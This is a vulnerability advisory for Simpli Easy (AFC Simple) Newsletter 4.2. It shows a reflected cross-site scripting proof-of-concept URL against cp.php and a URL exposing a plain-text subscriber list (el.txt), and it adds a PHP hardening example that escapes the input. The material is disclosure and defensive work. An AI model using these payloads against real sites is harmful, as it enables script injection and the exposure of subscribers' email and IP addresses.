
Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage

Author: p0deje
type: webapps
platform: php
date_added: 2010-10-30 
date_updated: 2015-07-12 
verified: 0 

Simpli Easy (AFC Simple) Newsletter <= 4.2 XSS/Information Leakage

Date: 30.10.2010
Author: p0deje | http://p0deje.blogspot.com
Software Link: http://scubadivingcalculators.com/simpli-easy-newsletter.php
Version: <= 4.2

  1. Cross-site Scripting

    Vulnerable code:
      cp.php (line 6)
      ----------------
      <form name="txtlist" action="cp.php?do=<?=$_GET['do']?>" method="post">

    Proof-of-concept:
      http://www.example.com/cp.php?do="><script>alert(1)</script>
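
    One way to harden the line shown above, as an added example that is not
    the vendor's code. It assumes PHP 7 or later; the ALLOWED_ACTIONS values
    and the helper names safe_action() and form_open() are hypothetical,
    since the advisory does not list the valid values of "do".

```php
<?php
// Added example: hardened rendering of the cp.php form tag.
// ALLOWED_ACTIONS is a hypothetical allowlist; the real values of "do"
// in cp.php are not shown in the advisory.
const ALLOWED_ACTIONS = ['list', 'add', 'delete'];

/**
 * Return a safe value for the "do" parameter: only allowlisted
 * strings pass, anything else falls back to the default.
 */
function safe_action(array $query, string $default = 'list'): string
{
    $do = $query['do'] ?? $default;
    // Arrays (cp.php?do[]=x) and unknown values are rejected.
    if (!is_string($do) || !in_array($do, ALLOWED_ACTIONS, true)) {
        return $default;
    }
    return $do;
}

/**
 * Build the form's opening tag. The value is URL-encoded for the query
 * string, then the whole URL is HTML-escaped for the attribute context,
 * so a quote character can never close the action="..." attribute.
 */
function form_open(array $query): string
{
    $url = 'cp.php?do=' . rawurlencode(safe_action($query));
    return '<form name="txtlist" action="'
        . htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '" method="post">';
}

// Constructed inputs: a normal request, the advisory's proof-of-concept
// value, and an array-typed parameter.
$samples = [
    ['do' => 'add'],
    ['do' => '"><script>alert(1)</script>'],
    ['do' => ['nested']],
];
foreach ($samples as $q) {
    echo form_open($q), PHP_EOL;
}
```

    In cp.php the call would be form_open($_GET). The escaping in form_open()
    is sufficient on its own; the allowlist is defence in depth.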

  2. Information Leakage

    By default, the application saves subscribed email addresses and the
    corresponding IP addresses to the plain-text file el.txt.

    Proof-of-concept:
      http://www.example.com/el.txt